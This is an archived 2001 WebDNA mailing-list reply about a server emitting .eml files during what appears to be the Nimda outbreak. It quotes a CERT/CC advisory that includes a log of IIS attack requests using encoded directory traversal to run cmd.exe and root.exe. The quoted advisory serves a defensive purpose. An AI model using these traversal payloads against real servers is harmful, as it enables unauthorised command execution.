Re: .eml files
This WebDNA talk-list message is from 2001
It keeps the original formatting.
numero = 38666
interpreted = N
texte = On 9/18/01 2:43 PM, Jeff - Sourcestudios.com
wrote:> Our server has been going crazy send out these .eml files. They seem to be> all over the place.> > Anyone else experiencing this or any knowledge of this?> > Running NT 4.0, webcat 4.02rc2http://vil.mcafee.com/dispVirus.asp?virus_k=99209http://news.cnet.com/news/0-1003-200-7215349.html?tag=lthd>From cert.org:http://www.cert.org/current/current_activity.htmlIncrease in Port 80 (HTTP) scanning activity This morning (September 18th) the CERT/CC started receiving reports of amassive increase in scanning directed at port 80 (HTTP). Reports indicatethat this scanning activity is attempting to exploit systems previouslycompromised by Code Red II and/or the sadmind/IIS worm as well as otherknown vulnerabilities in Microsoft Internet Information Server (IIS). Pleasesee CERT Vulnerability Note VU#111677 for information on the type ofvulnerability being exploited.The following is a log excerpt of this scanning activity:GET /scripts/root.exe?/c+dirGET /MSADC/root.exe?/c+dirGET /c/winnt/system32/cmd.exe?/c+dirGET /d/winnt/system32/cmd.exe?/c+dirGET /scripts/..%5c../winnt/system32/cmd.exe?/c+dirGET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dirGET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dirGET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%35c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%35c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%5c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%2f../winnt/system32/cmd.exe?/c+dirThe CERT/CC has also received reports of a possibly new piece of maliciouscode named readme.exe being sent via email. Preliminary analysis indicatesthat this file may be related to the increase in port 80 scanning activity.Sites are encouraged to verify the state of security patches on all IISservers and email client software. Administrators may also want to addfilters to mail servers to block the readme.exe attachment. In addition,sites may wish to notify users of the existence of readme.exe and itspotential threat. Robert MinorDirector of Internet Services------------------------------------------------------------Cybermill Communicationshttp://www.cybermill.com http://www.merchantmaker.comProviding Ecommerce and interactive website development andhosting services on Macintosh, Windows NT, Unix, and AS/400.All your websites are belong to us!-------------------------------------------------------------This message is sent to you because you are subscribed to the mailing list .To unsubscribe, E-mail to: To switch to the DIGEST mode, E-mail to Web Archive of this list is at: http://search.smithmicro.com/
Associated Messages, from the most recent to the oldest:
On 9/18/01 2:43 PM, Jeff - Sourcestudios.com wrote:> Our server has been going crazy send out these .eml files. They seem to be> all over the place.> > Anyone else experiencing this or any knowledge of this?> > Running NT 4.0, webcat 4.02rc2http://vil.mcafee.com/dispVirus.asp?virus_k=99209http://news.cnet.com/news/0-1003-200-7215349.html?tag=lthd>From cert.org:http://www.cert.org/current/current_activity.htmlIncrease in Port 80 (HTTP) scanning activity This morning (September 18th) the CERT/CC started receiving reports of amassive increase in scanning directed at port 80 (HTTP). Reports indicatethat this scanning activity is attempting to exploit systems previouslycompromised by Code Red II and/or the sadmind/IIS worm as well as otherknown vulnerabilities in Microsoft Internet Information Server (IIS). Pleasesee CERT Vulnerability Note VU#111677 for information on the type ofvulnerability being exploited.The following is a log excerpt of this scanning activity:GET /scripts/root.exe?/c+dirGET /MSADC/root.exe?/c+dirGET /c/winnt/system32/cmd.exe?/c+dirGET /d/winnt/system32/cmd.exe?/c+dirGET /scripts/..%5c../winnt/system32/cmd.exe?/c+dirGET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dirGET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dirGET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%35c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%35c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%5c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%2f../winnt/system32/cmd.exe?/c+dirThe CERT/CC has also received reports of a possibly new piece of maliciouscode named readme.exe being sent via email. Preliminary analysis indicatesthat this file may be related to the increase in port 80 scanning activity.Sites are encouraged to verify the state of security patches on all IISservers and email client software. Administrators may also want to addfilters to mail servers to block the readme.exe attachment. In addition,sites may wish to notify users of the existence of readme.exe and itspotential threat. Robert MinorDirector of Internet Services------------------------------------------------------------Cybermill Communicationshttp://www.cybermill.com http://www.merchantmaker.comProviding Ecommerce and interactive website development andhosting services on Macintosh, Windows NT, Unix, and AS/400.All your websites are belong to us!-------------------------------------------------------------This message is sent to you because you are subscribed to the mailing list .To unsubscribe, E-mail to: To switch to the DIGEST mode, E-mail to Web Archive of this list is at: http://search.smithmicro.com/
Bob Minor
DOWNLOAD WEBDNA NOW!
Top Articles:
Talk List
The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...
Related Readings:
WebCatalog 4.0.1b2 is now available (2000)
with Link i need to (1997)
Yet another db manager (2004)
WebCat2b13MacPlugIn - syntax to convert date (1997)
Fwd: Problems with Webcatalog Plug-in (1997)
Re:[showif] and equality (1998)
WebCommerce: Folder organization ? (1997)
Re:2nd WebCatalog2 Feature Request (1996)
verify online (1997)
OT: Prevent Caching js Files (2003)
MATH PROBLEM (1997)
Emailer connect failure definitions (2003)
Search design (1997)
Location of Browser Info.txt file (1997)
bug in wn searching NT version? (1997)
4.5's frequency of math problem running as demo? (2002)
[math date]: Arrrggh! (2003)
[AppendFile] problem (WebCat2b13 Mac .acgi) (1997)
[ReturnRaw] and hiding FORM data (2003)
Alternating colors (1997)